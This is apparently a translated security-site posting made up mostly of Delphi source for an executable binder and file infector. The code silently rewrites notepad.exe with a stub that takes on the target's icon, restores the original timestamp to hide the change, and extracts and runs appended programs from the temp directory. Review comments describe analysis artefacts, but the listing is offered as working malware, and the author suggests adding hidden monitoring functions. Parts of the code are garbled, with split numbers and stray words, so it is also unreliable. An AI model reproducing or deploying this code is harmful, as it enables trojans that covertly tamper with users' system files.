A new approach to bundled executable files — vulnerability warning — Black Bar Safety Net

ID MYHACK58:62200610922
Type myhack58
Reporter 佚名
Modified 2006-08-06T00:00:00


Latest feature: when bundled with an application, the resulting file takes on the other program's icon. This demonstration program has no form; after compiling and compressing it is only about 40K, and it does not stay resident in memory for long after running. If you add a hidden form, a function that searches for and runs programs, and a system-monitoring function, plus % $ # @ * ^ ...

A few numbers in the program must be determined: 1. this program, compiled and compressed with Aspack.exe, is 41472 bytes in size. 2. After analysis of the Aspack.exe-compressed program, the part before the icon is 40751 bytes long, the icon data is the 640 bytes starting at byte 40752, and 81 bytes follow the icon.

Layout of the bundled file: the first 40751 bytes of this program + the icon of the bundled application + the last 81 bytes of this program + the whole of the bundled application.

How to find the icon position: set the program's icon to a 32*32 red block, compile and compress the program, load it in a hex editor and search for the string “999999”. Afterwards the program can be given another suitable icon. Hex editor: UltraEdit is commonly used; since it has a date limit, the author wrote his own with hex editing, compare and search functions, which is continually improved and handles files of a few hundred K without problems: http://guanbh.top263.net/download/hexedit.exe } program exe2;

uses classes, Tlhelp32, windows, graphics, ShellAPI, SysUtils;

{$R *. RES}

{ Global state shared by copy2, CreateFileAndRun and the main block.
  NOTE(review): several tokens in this listing ("The Size", "the CopyFrom",
  digits separated by spaces, a stray ") look like extraction artefacts of
  the original source; they are left as found. }
var
  lppe:TProcessEntry32;      { process entry filled in by Process32First/Process32Next }
  found:boolean;             { result of the most recent Process32First/Next call }
  handle:THandle;            { Toolhelp snapshot handle; copy2 also passes it to extracticon }
  ProcessStr,ExeName:string; { all running process names concatenated; path of this executable }
  WinDir:pchar;              { Windows directory, used to build the path of notepad.exe }
const
  { Size in bytes of this stub as compiled and packed. Everything past this
    offset in the running file is treated as an appended, bundled program,
    so the value has to be updated whenever the stub is rebuilt or repacked.
    For an analyst this is a fixed offset at which an 'MZ' marker indicates
    an appended executable. }
  MySize=4 1 4 7 2; {!! This value must be changed to match the compiled/compressed file size !!}

{ copy2: overwrites the executable at path s with a copy of this stub that
  carries s's own icon, followed by the complete original s, so the file
  keeps its appearance while now launching the stub first.
  Resulting layout (see the header comment): the first 40751 bytes of the
  stub + 640 bytes of icon image taken from s + the 81 stub bytes that
  follow the icon + the whole original file s.
  Does nothing when s does not exist, when no icon can be extracted from it,
  or when the two bytes at offset MySize already read 'MZ' (the file was
  bundled before). The original file date is saved before the write and
  put back afterwards, so the modification does not show in the timestamp.
  Any exception inside the try block is swallowed by the empty except. }
procedure copy2(s:string);
var
  s1,s2,IcoStream:TMemoryStream;
  File2:TFilestream;
  ch:array[0..1] of char;
  ss:string;
  filetime,fhandle:integer;
  l:integer;
  File2Icon:Ticon;
begin
  {If file s does not exist, do nothing}
  if FileExists(s)=False then exit;
  try
    {If the file has no icon, it is not bundled}
    File2Icon:=Ticon. Create;
    { NOTE(review): extracticon's first argument is the Toolhelp snapshot
      handle set in the main block, not a module instance handle }
    l:=extracticon(handle,pchar(s),0);
    if l=0 then
      begin
        File2Icon. Free;
        exit;
      end
    else
      begin
        {Extract the icon of the program being bundled and save it to IcoStream}
        File2Icon. Handle:=extracticon(handle,pchar(s),0);
        IcoStream:=TMemoryStream. Create;
        File2Icon. SaveToStream(IcoStream);
        File2Icon. Free;
      end;
    {Already-bundled check: if the two bytes at offset MySize of s read 'MZ',
     a second PE header follows the stub and the file has been merged before}
    File2:=TFilestream. Create(s,fmopenread);
    if File2. The Size>MySize then
      begin
        File2. Position:=MySize;
        File2. Read(ch,2);
        ss:=copy(ch,1,2);
        if ss='MZ' then
          begin
            File2. Free;
            exit;
          end;
      end;
    File2. Free;

    {Combine this executable (ExeName, set in the main block) with s: stub + s is written back as s}

    s2:=TMemoryStream. Create;
    s2. loadfromfile(ExeName);
    s1:=TMemoryStream. Create;

    { Copy the first 40751 bytes of the stub, then 640 bytes of icon data
      in place of the stub's own icon at byte 40752.
      !! The figures 40751 and 81 below must be adjusted to the actual build !! }
    s1. the CopyFrom(s2,4 0 7 5 1);
    {Replace the stub's icon with the bundled program's icon: skip the first
     126 bytes of the saved icon stream and copy 640 bytes (icon size is 766)}
    IcoStream. Position:=1 2 6;
    s1. The CopyFrom(IcoStream,6 4 0);
    IcoStream. Free;
    s2. Position:=4 0 7 5 1+6 4 0;
    {Append the 81 stub bytes that follow the icon}
    s1. The CopyFrom(s2,8 1);
    s2. clear;
    s2. loadfromfile(s);
    s1. seek(s1. size,soFromBeginning);
    {Append the entire bundled program}
    s1. the CopyFrom(s2,s2. size);
    s2. free;
    {Remember the original date of file s}
    fhandle:=FileOpen(s, fmOpenread);
    filetime:=filegetdate(fhandle);
    fileclose(fhandle);
    s1. SaveToFile(s);
    {Restore the original date of file s; the file grows by MySize bytes but keeps its timestamp}
    fhandle:=FileOpen(s, fmOpenwrite);
    filesetdate(fhandle,filetime);
    fileclose(fhandle);
    s1. free;
  except
  end;
end;

{ CreateFileAndRun: releases and starts the program that was appended to
  this stub. If the running file is exactly MySize bytes nothing was
  bundled and the procedure returns. Otherwise every byte past offset
  MySize is written to the temporary directory under this executable's own
  file name and started with winexec, with all command-line parameters
  passed through unchanged. A failed SaveToFile is swallowed by the empty
  except, and winexec is attempted regardless.
  Artefact for analysis: a file named like the launcher appears in the
  temporary directory each time the bundled program is run. }
procedure CreateFileAndRun;
var
  s1,s2:TMemoryStream;
  TempDir:pchar;
  cmdstr:string;
  a:integer;
Begin
  s1:=TMemoryStream. Create;
  s1. loadfromfile(ExeName);
  {Plain stub with nothing appended: nothing to release}
  if s1. Size=MySize then
    begin
      s1. Free;
      exit;
    end;
  {Everything after offset MySize is the bundled program}
  s1. seek(MySize,soFromBeginning);
  s2:=TMemoryStream. Create;
  s2. the CopyFrom(s1,s1. Size-MySize);
  GetMem(TempDir,2 5 5);
  GetTempPath(2 5 5,TempDir);
  try

    { Write the bundled file to the temporary directory. The original
      comment suggests a less conspicuous directory could be used instead. }

    s2. SaveToFile(TempDir+'\'+ExtractFileName(ExeName));
  except
  end;
  {Rebuild the command line from ParamStr(1..) so the real program receives the same arguments}
  cmdstr:=";
  a:=1;
  while ParamStr(a)<>" do
    begin
      cmdstr:=cmdstr+ParamStr(a)+' ';
      inc(a);
    end;
  {Run the real program from the temporary directory}
  winexec(pchar(TempDir+'\'+ExtractFileName(ExeName)+' '+cmdstr),SW_SHOW);
  freemem(TempDir);
  s2. free;
  s1. free;
end;

{ Entry point. Records the Windows directory and this executable's own
  path, builds a list of all running process names with the Toolhelp32
  snapshot API, bundles the stub into notepad.exe in the Windows directory
  unless notepad is currently running, then calls CreateFileAndRun so that
  any program appended to this stub is released and started.
  Artefact for analysis: notepad.exe in the Windows directory grows by
  MySize bytes while its file date is preserved (see copy2). }
begin
  GetMem(WinDir,2 5 5);
  GetWindowsDirectory(WinDir,2 5 5);
  ExeName:=ParamStr(0);
  {Snapshot of all processes; the same handle is reused by copy2 for extracticon}
  handle:=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
  found:=Process32First(handle,lppe);
  ProcessStr:=";
  while found do
    begin
      ProcessStr:=ProcessStr+lppe. szExeFile;{concatenate all process image names}
      found:=Process32Next(handle,lppe);
    end;
  {If notepad is not running, bundle the stub into it}
  if pos(WinDir+'\notepad.exe',ProcessStr)=0 then
    begin
      copy2(WinDir+'\notepad.exe');
    end;
  {Other files to bundle follow the same pattern: if pos(...,ProcessStr)=0 then begin copy2(...); end; ... }
  freemem(WinDir);
  { Placeholder in the original for additional behaviour }
  CreateFileAndRun;{release the bundled file and run it with the original parameters}
end.